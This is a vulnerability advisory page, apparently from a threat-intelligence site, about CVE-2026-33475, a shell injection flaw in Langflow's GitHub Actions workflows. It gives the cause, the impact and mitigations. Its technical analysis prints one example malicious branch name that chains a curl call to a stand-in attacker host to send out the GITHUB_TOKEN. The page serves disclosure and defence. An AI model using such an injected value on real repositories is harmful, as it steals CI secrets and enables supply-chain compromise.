Skip to main content
Press slash or control plus K to focus the search. Use the arrow keys to navigate results and press enter to open a threat.
Reconnecting to live updates…

CVE-2026-33475: CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') in langflow-ai langflow

0
Critical
VulnerabilityCVE-2026-33475cvecve-2026-33475cwe-74cwe-78
Published: Tue Mar 24 2026 (03/24/2026, 12:54:33 UTC)
Source: CVE Database V5
Vendor/Project: langflow-ai
Product: langflow

Description

CVE-2026-33475 is a critical unauthenticated remote shell injection vulnerability in langflow versions prior to 1. 9. 0. It arises from improper sanitization of user-controlled GitHub context variables interpolated directly into shell commands within GitHub Actions workflows. Attackers can exploit this by creating malicious branch names or pull request titles that inject arbitrary shell commands during CI/CD execution. This leads to exfiltration of sensitive secrets such as GITHUB_TOKEN, unauthorized infrastructure manipulation, and potential supply chain compromise. The vulnerability affects multiple workflow files and actions in the Langflow repository. The issue is patched in version 1. 9. 0 by using environment variables and proper quoting to prevent injection.

AI-Powered Analysis

Machine-generated threat intelligence

AILast updated: 03/24/2026, 13:15:56 UTC

Technical Analysis

Langflow, a tool for building AI-powered agents and workflows, contains a critical shell injection vulnerability (CVE-2026-33475) in its GitHub Actions workflows prior to version 1.9.0. The root cause is the unsanitized interpolation of GitHub context variables such as `${{ github.head_ref }}` and `${{ github.event.pull_request.title }}` directly into `run:` steps in workflow YAML files. Since these variables can be controlled by an attacker via branch names or pull request titles, they serve as vectors for injecting arbitrary shell commands. For example, a malicious branch name like `injection-test && curl https://attacker.site/exfil?token=$GITHUB_TOKEN` causes the injected command to execute during CI runs, leaking sensitive secrets such as the `GITHUB_TOKEN`. This token grants broad permissions within the repository, enabling attackers to push malicious code, manipulate releases, or compromise the supply chain. The affected files include multiple workflows and actions such as `deploy-docs-draft.yml`, `docker-build.yml`, and `install-playwright/action.yml`. The vulnerability requires no authentication or user interaction, making it highly exploitable in public forks with GitHub Actions enabled. The fix implemented in version 1.9.0 involves refactoring workflows to assign user-controlled values to environment variables and wrapping them in double quotes to prevent shell injection. Direct interpolation inside `run:` steps is avoided to ensure proper sanitization. This vulnerability is classified under CWE-74 and CWE-78, highlighting improper neutralization of special elements and command injection risks. Although no known exploits are reported in the wild yet, the critical CVSS score of 9.1 underscores the urgency of patching.

Potential Impact

The impact of CVE-2026-33475 is severe for organizations using Langflow with GitHub Actions enabled, especially public repositories or forks. Exploitation allows unauthenticated attackers to execute arbitrary shell commands within the CI environment, leading to full compromise of CI secrets such as `GITHUB_TOKEN`. This token can be used to push malicious code, tamper with releases, inject backdoors, or exfiltrate sensitive infrastructure data. The vulnerability effectively grants attackers remote code execution capabilities in the CI/CD pipeline, undermining the integrity and confidentiality of the software supply chain. Organizations relying on Langflow for AI workflows risk supply chain attacks, unauthorized deployments, and leakage of proprietary or sensitive information. The ease of exploitation without authentication or user interaction increases the likelihood of automated attacks. The scope includes any public fork or repository using vulnerable Langflow versions with GitHub Actions enabled, potentially affecting open source contributors and organizations integrating Langflow into their pipelines. This can lead to reputational damage, operational disruption, and compliance violations if exploited.

Mitigation Recommendations

To mitigate this vulnerability, organizations should immediately upgrade Langflow to version 1.9.0 or later where the issue is patched. For existing workflows, refactor all GitHub Actions workflows and custom actions to avoid direct interpolation of user-controlled GitHub context variables inside `run:` shell commands. Instead, assign these variables to environment variables and wrap them in double quotes to ensure proper shell escaping. For example, use `env: BRANCH_NAME: ${{ github.head_ref }}` and reference `$BRANCH_NAME` inside the script with quotes. Additionally, restrict repository permissions and secrets exposure in GitHub Actions by applying the principle of least privilege to tokens like `GITHUB_TOKEN`. Consider enabling branch protection rules and limiting who can create pull requests or branches that trigger workflows. Monitor CI logs for suspicious command executions and audit workflow files regularly for unsafe interpolations. Employ automated scanning tools to detect injection risks in CI/CD configurations. Finally, educate developers and DevOps teams about secure GitHub Actions practices to prevent similar injection flaws.

Pro Console: star threats, build custom feeds, automate alerts via Slack, email & webhooks.Upgrade to Pro

Technical Details

Data Version
5.2
Assigner Short Name
GitHub_M
Date Reserved
2026-03-20T16:16:48.969Z
Cvss Version
3.1
State
PUBLISHED

Threat ID: 69c28b09f4197a8e3b35a4bc

Added to database: 3/24/2026, 1:00:57 PM

Last enriched: 3/24/2026, 1:15:56 PM

Last updated: 3/24/2026, 2:05:23 PM

Views: 6

Community Reviews

0 reviews

Crowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.

Sort by
Loading community insights…

Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.

Actions

PRO

Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.

Please log in to the Console to use AI analysis features.

Need more coverage?

Upgrade to Pro Console for AI refresh and higher limits.

For incident response and remediation, OffSeq services can help resolve threats faster.

Latest Threats

Breach by OffSeqOFFSEQFRIENDS — 25% OFF

Check if your credentials are on the dark web

Instant breach scanning across billions of leaked records. Free tier available.

Scan now
OffSeq TrainingCredly Certified

Lead Pen Test Professional

Technical5-day eLearningPECB Accredited
View courses